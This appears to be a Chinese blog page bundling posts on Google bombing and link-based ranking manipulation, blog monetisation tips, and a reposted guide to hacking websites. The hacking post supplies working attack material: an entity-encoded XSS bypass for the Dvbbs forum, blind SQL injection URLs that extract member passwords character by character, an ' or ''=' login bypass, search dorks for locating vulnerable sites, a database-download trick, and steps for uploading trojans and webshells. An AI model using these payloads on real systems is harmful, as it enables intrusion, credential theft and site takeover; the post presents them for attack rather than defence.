谷歌(google)炸弹依然还起作用

2

分类 : 技术文摘 | 发表时间 08-09-2010

什么是谷歌炸弹?

一些人利用Google来提升有关他人不利报道的文章或网页的点击率,以此让搜索者能更容易找到这些文章或网页的方法称之为“Google炸弹”。 通过把包含某一搜索关键字的大量链接与目标网页连接后,就可以获得提高排名的效果。

“Google炸弹”是互联网上的一句俚语,代表提高某一网页在Google搜索中的排名,常带有幽默或政治意图。

   9月7日,法国总统萨科齐在“脸谱”网站的个人主页近日遭遇“谷歌炸弹”,总统府有关人士对此表示不满。网民在谷歌搜索引擎中使用法文输入“肛门”一词,便会被导入萨科齐在“脸谱”网站的个人主页。法国总统府一些人士就此表示,这是明显对总统进行侮辱的行为。他们同时表示,一些过激行为的出现是网络自由的必然结果。

“谷歌炸弹”是指一些人利用谷歌搜索引擎,在某关键词、文章或网站间建立联系,进而增加对某人不利的文章或网站点击率的做法。这种使用恶作剧方式对政治领导人进行讽刺的案例不在少数,美国现任总统奥巴马、前任总统布什等人均遭遇过。

“谷歌炸弹”著名案例:

第一次google炸弹发生在1999年。尽管创作者匿名,当上的一个用户,贴出一个疑问指出为什么google“比魔鬼撒旦本人更邪恶”,炸弹的存在自此被揭露出来。用google搜索短语的用户发现微软的主页总是出现在搜索结果的第一顺位。短语炸弹本身由Adam Mathes在2001年缔造,为此他写了一篇文章,关于他是如何将“talentless hack”作为炸弹,借以取笑他的一个朋友,平面设计师Andy Pressman的。

最著名的google炸弹之一是在2004年的美国George W. Bush二次竞选之际。想要亲历这次特别的google炸弹,试着在google搜索“miserable failure”。得到的第一个结果会是George W. Bush在白宫官方网站上的自传。为了使炸弹起作用,许多作者必须在自己的超链接描述中用准确词汇“miserable failure”才能使其网页链接到白宫自传的网页。

在美国争夺国会控制权的选战中,一些民主党支持者利用“谷歌炸弹”来提升攻击共和党的文章的点击率,让搜索者能更容易找到这些文章。一些人利用这一手段,成功地将总统布什和“悲惨失败”四个字联系了起来,搜索者只要在英文谷歌网站(Google)上输入短语“悲惨失败(Miserable failure)”,就会被引导到白宫网站写有布什简历的页面上。

而在2007年1月份,以色列总理奥尔默特也同样沦为“谷歌炸弹”攻击对象。搜索者只要在谷歌(Google)搜索引擎上用希伯来文输入“悲惨失败”,就会被引导到以色列官方网站写有奥尔默特简历的页面上。由于奥尔默特的“加盟”,至此“悲惨失败”一词可以链接到两位政治人物。即:美国总统布什和以色列总理奥尔默。

“谷歌炸弹”是怎么形成的?

1)数目众多的网页链接指向某一个URL;

2)这些链接都使用特定关键词做链接文字;

3)被链接的URL中一般并不包含这个关键词,内容和这个关键词也基本无关;

4)达到的效果就是这个被链接的URL在这个特定关键词下,搜索引擎排名急剧上升,很多时候都排到第一。

谷歌炸弹大部分都是出于恶作剧,政治目的,做实验等。其实现是基于搜索引擎排名算法中的两个事实:

1)外部链接是排名的重要因素之一

2)链接文字很多时候比链接数量更重要

所以当有大量包含特定关键词的链接指向某一个网页的时候,这个网页就算没提到这个关键词,排名也会非常好。

谷歌(google)官方对“谷歌炸弹”的解释:

谷歌在官方博客中写道:“我们没有采用人工对这些恶作剧进行编辑的方式,而是在几年前开发了一种算法来检测谷歌炸弹。我们不会一直采用这一算法,因为它需要消耗部分计算能力,以对所有页面索引进行处理。此外,真正的谷歌炸弹也非常少见。在得悉最近的谷歌炸弹后,我们重新运行了前述算法,并发现了cheerful achievement 和miserable failure 这两种谷歌炸弹。经过修正后,输入这些搜索词将引导到谷歌炸弹的讨论页面,而不是原先的页面”。

由Linker经过实际的案例分析,现在这样的关键词排名形式,在谷歌依然有效,所以谷歌关键词排名,外链为主。只是别让谷歌过于明显的看到你的资源,否则谷歌也是不排除手工干预的。

行业网站关键词排名调整中

0

分类 : 技术文摘 | 发表时间 03-12-2009

一位朋友的网站,已经优化了将近四个月了,google已经上了首页,但百度的迟迟百页以内还无动静,有些一筹莫展了。
无法自由化处理,只有等一等。
委托的朋友已经外链了做进一步处理了,Linker再在原创文章上,加个一两周试一试!!
等待%¥#%……期待中……

如何做一个能盈利的博客

1

分类 : 业界动态 | 发表时间 02-10-2006

  自从blog系统诞生以来确实为大量缺乏编程能力的人们带来了无数介入网络盈利的机会。由于web2.0这种噱头和亮点,无数的媒体和网站也大力投入资源进行建设,同时衍生了大量关于blog的“专业文章”。

  纵观而言,这些文章无不是挂着国内外知名博客如何成名的技巧,似乎自己的一鸣惊人也之日可待,要知道天下没有免费的午餐,如果这些技巧真的管用,我想他们将永远不会共示于众,永远会在邪恶的黑暗中永生吧。

  平心而论,我自己的水准很低,不敢于众位名家指点江山,谈今论古。仅仅从节约时间和节约精力的角度上说说我对这些技巧的看法。

  1、Google Adsense 技巧

  实际上,我劝你一句,放弃Google Adsense,不要花时间和精力去搞了,在国内没有那个团队或个人通过它取得了第一桶金。理由如下:

  google adsense 根本就不信任中国的网站,这一点无需多论,google一下,你会发现被kill账号的blog多如牛毛,收到美金的帖子大多都是带有广告性的。

  另外,在网站上采用图片、音乐、或转载书籍内都可能涉及版权,这些都是被kill的原因,所以不想过多地怪罪google。但是除了自己写原创似乎没有合理的盈利手段了。

  2、链接交换技巧

  每个专家都告诫我们一定要多做高等级链接,但是实际上不可能,你会和一个比你等级和流量都低的站点交换链接嘛?答案肯定是否定的,推己及人,这个技巧就是永远正确的废话。

  要善于发现新站点,特别是那种大容量站点,假设这个站点没有采用普通的网站管理系统或由自己开发,无论你的等级和流量多高,对方多低,必链!然而这样的站点不多,没事就多搜索一下 类似 诚征友情链接 你的站点您的网站 等等关键词。每个月可能会发现几个。

  不要和QQ群里面的叫嚷着交换链接的网站交换链接,你会发现这些人太急于功利,你的链接随时会消失的。

  合理地在自己的首页上留下交换链接的方式,不要采用自助系统,一定要选择那种比较正规的网站交换,他们没有太多的时间去删减链接,同时比较有良好的发展趋势。

  3、seo技巧

  这个技巧等于说是没有技巧,都是拿来忽悠费用的。

  没事就不要去看seo的网站,按照上面的大法来优化自己的网站需要事先考虑好后事。

  如果确实想优化,就去读读html的定义,按照htm的语言来描述自己的页面即可。

  seo的唯一技巧就是大智若愚,以千斤压四两,充分考虑长尾理论。多用点心在内容建设方面,少花时间在在优化方面,今天能更新2篇,就决不只更新1篇。

  4、内容技巧

  不要高屋建瓴,内容一定要细腻

  没话说可以不说,也可以写今天好像没说的,但是不要痛苦的叫春。

  每次讨论把问题的范围缩到最小,题目大了,其实你什么都说不清楚,而且很快就没有说的了,范围小了就可以连载,一旦话题连载,你想没声势都不可能了

  没事不要老是练习输入 最 这个字,比如国内最大,世界最大等等

  个人站点就不要搞什么战略合作伙伴了,把自己认为好的网站放出来,会让你的访问者觉得有收获,这些链接都可能给你带来回头客,

  不要认为链接很重要,也不要认为流量很重要,即便别人frame你,不要去考虑加个什么js来稿定对方,应该明白上了网就等于公开了,别人能frame你算是有道德的,如果copy你,你连露脸的机会都没有。

  5、流量价值技巧

  最没有价值的东西就是流量,不要为了流量而流量

  如果你没有打算当天下第一鸡婆或龟公就不要把色情内容放在你的内容里

  不要再网络上讨论网络,除了色情流量之外,最没有价值的就是网络技巧流量,这种流量的人对网络太了解,不要期望他们点击你的广告,不骂你就算照顾你了。

  社会新闻流量算是第三无聊的流量,门户网站太多了,多到他们自己都开始对咬了,你连参与咬咬得机会都没有:)

   最有价值的流量是:女性话题、消费时尚。判断流量价值的简单标准就是,阅读这些文章的人收入水平如何+对网络的了解程度+对广告的了解程度,ok,吸引 了这样的人群,哪怕你一天只有100个ip,你都能赚钱啊,ibm当年20个人里面卖8台笔记本的案例大家都熟悉吧。不要沦落到5块钱1000ip中去, 加上扣量,估计1万ip能有3块钱就算祖上烧高香了。

  转载自 精品风景线 blog 内部参考

入侵网站的各种漏洞的利用

0

分类 : 系统安全 | 发表时间 13-06-2006

信息来源:慕容小雨’s blog

慕容小雨何许人也,偶不认识,不过听neeao说过多次,再从作品上看,当非凡人也!呵

各种漏洞的利用和一些搜索参数
说到漏洞,首先应该提到的就是动网的上传漏洞了。

“洞网”漏洞拉开了上传漏洞文件的序幕,其他系统的上
传漏洞接踵而来!

asp动网论坛漏洞分析

1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的。例子说明一下,在发帖时写入[img]javas&#x63ript:window.open(‘htt&#x70://www.fwcn.com’,”)[/img] 很清楚地看到,#x63解码的字母是”c”,#x70解码的字母是”p”,&起到连接作用,最后加上[img],使JS被触发,如果论坛支持flash插入,用[swf]也可。利用这个漏洞可以搞些恶作剧,写上诱人的主题,点进去结果是他的主页(骗点击率,作广告),甚至更绝,连到一个有病毒、木马的网页上,让你直想骂娘。这个漏洞存在于动网的各个版本,包括较新的0519版,覆盖面积之广让人瞠目,各人认为应该对某些非法字符进行检测剔除,而非简简单单地拆分了事,真希望动网开发者能尽早补上这漏洞。

2、比起前者,第二个漏洞问题就大啦,利用该漏洞可以破解掉论坛上所有注册会员的密码(恐怖~~~),由于论坛管理员通常直接把论坛程序载下来梢加以美工就拿来使用了,图方便直接导致了漏洞的出现,我们也载一个回来,只要看一下动网的数据库,就知道了密码的字段为userpassword,接着例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,读取参数的语句是:username=trim(request(“name”)),数据库的查询的语句是: sql=”select * from [user] where username=’”&username&”‘”,看得出来, abc就是直接被作为了dispuer的一个参数username,另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword=”******”,理论上这样就可以实现对密码的破解了,但这么破要破到何年何月,现在就要轮到VBS函数大显身手了,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20’1′=’1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql=”select * from [User] where username=’abc’ and len(UserPassword)=5 and ’1′=’1′”,现在明白点了吧,%20是空格,abc后面的单引号和’1′=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.asp?name=abc'%20and%20left(userpassword,1)=’a,如果猜对了就给出用户资料,猜对了就给出该用户不存在的提示,这样子还是嫌太慢,那就在外面再套个asc函数,http://xxxxx/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>’50 试出用户密码的ASCII码是否大于50,不断地缩小范围,相信很快就能将范围缩小至个位数,看到这里你是否惊出了一身冷汗,起码我是如此,*几个函数的灵活运用,保守地说,不出半小时就能破解出密码。真是不幸中的大幸,动网开发者在后来的05**版后使用了MD5的加密,这下子总算放心了,但介于国内还有许多地方在使用老版本的动网论坛(包括一个小有名气的flash站点)

3 、动网SQL语句漏洞
此漏洞针对动网SQL版本。
测试方法:在http://ip/bbs/admin_index.asp 输入用户名是’or”=’ 密码也是这个
这样可以跳过认证
原理:利用SQL语法。输入的密码和ID就成为一个合法的SQL语句,直接跳过认证。
此漏洞并不针对动网。很多SQL的ASP都会有这个漏洞

4、动网论坛sp2漏洞 (此漏洞影响范围甚大,动网官方站、黑客防线、安全基地都曾因此被黑过,具体资料大家可以在百度搜一下)
上传漏洞路径:reg_upload.asp及upfile.asp

青创文章系统

打开google 输入.tw qcdn (或者是去百度搜索 Powered by:QCDN_NEWS 但大多数是中国的)
青创文章系统
上传漏洞。在网址后加/admin_upfile.asp 如果出现。
Microsoft VBScript 磅︽顶琿岿粇 岿粇 ’800a01b6′
ンぃや穿妮┦┪よ猭: ‘form’
/article/admin_upfile.asp, 21
就代表已经有90%以上的希望了
桂林老兵的上传工具上传木马
入侵的時候發現admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊

青创文章管理系统注入功击
关键字”list.asp?unid=”
工具:
  1、NBSI好像大部分黑客站点都有得下。
  2、MD5Crack2,破解MD5加密的软件(磊子推荐:dos下DV.exe比较好用)
第一次检测的时候,会报告”暂未检测到注入漏洞”;然后在”特征字符”输入”Unid”
(提示:”Unid”中的” U “一定要是大写的

“飞龙文章管理系统” 漏洞

飞龙文章管理系统 Ver 2.0 Build 20040620 正式版漏洞利用
搜索”Article.asp?ArtID=”关键字
漏洞文件在
admin_upfile.asp
user_upfile.asp
这两个文件”upfile.asp”
动网漏洞的再现
上传时cookie中加”ArtID=1111;”

phpwind 1.3.6 的论坛漏洞的利用
搜索关键字”POWER BY PHPWIND v1.3.6″

phpwind1.3.6论坛利用程序 “群共享”中有上传

保存后,木马地址为当前目录下的faq.php

在本机用如下表单进行提交:

METHOD=”POST”>




上传成功后的木马存在论坛目录下
直接访问就行!

漏洞集合

1)Co Net MiB Ver1.0~4.0 用’or’='or’登陆管理员(一个比较经典的漏洞)

2)ASP Calendar漏洞 请在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01这个信息,程序的默认数据库为o12cal.mdb(非MD5加密,明文保存)

3)六合彩漏洞 我们打开www.baidu.com或是www.google.com
在搜索里输入 请各位验证会员料
http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc

<%DBPath=Server.MapPath("wz520#.mdb")
Set conn=Server.CreateObject(“ADODB.Connection”)
conn.Open “Driver={Microsoft Access Driver (*.mdb)};DBQ=”&DBPath%>

wz520#.mdb,他就是数据库了。#改成%23就可以下载数据库了

4)青创文章系统出现严重漏洞 在网址后加/admin_upfile.asp上传WEBSHELL

百度搜索 Powered by:QCDN_NEWS 台湾.tw qcdn。

还可以用%5c暴库,通杀

“list.asp?unid=” ” .tw/list.asp?unid= ” 存在注入 在”特征字符”输入”Unid”
(”Unid”中的” U “一定要是大写的)

5)自由动力3.6的软件上传过滤不严 用WinHex.exe和WSockExpert.exe修改上传木马

E时代驿站漏洞
百度搜索”E时代驿站”
漏洞利用页面 /upload.asp 用老
兵直接上传

沸腾新闻系统上传漏洞
搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用
漏洞:没有对空格进行严格的限制。
所以,我们直接选定要上传的asp木马,然后在后面加上空格
它的上传文件是UploadFaceOK.asp

尘缘雅境

在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看
到出现了
一大堆
使用尘缘雅境系统的网站.比如说他的网站首页
是http://www.xx.com/asfq/index.asp,那么就要这样填写
http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目
录]:/asfq/admin
(注意一定要加上admin),[漏洞文件]一般不用改,不过有
些老版的
尘缘系统
的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功
再改

OFSTAR论坛漏洞利用程序(群共享中)
搜索: powered by ofstar.net
1:输入管理员用户名 2:输入任意一个帖子的路径!

3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的!

4:单击直接登陆按钮!程序会自动构造Cookies进行登陆!单击管理栏的”超管”可直接进入后台!

上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样)

然后使用提交页面提交“可以直接拿到shell!



无觅相关文章插件,快速提升流量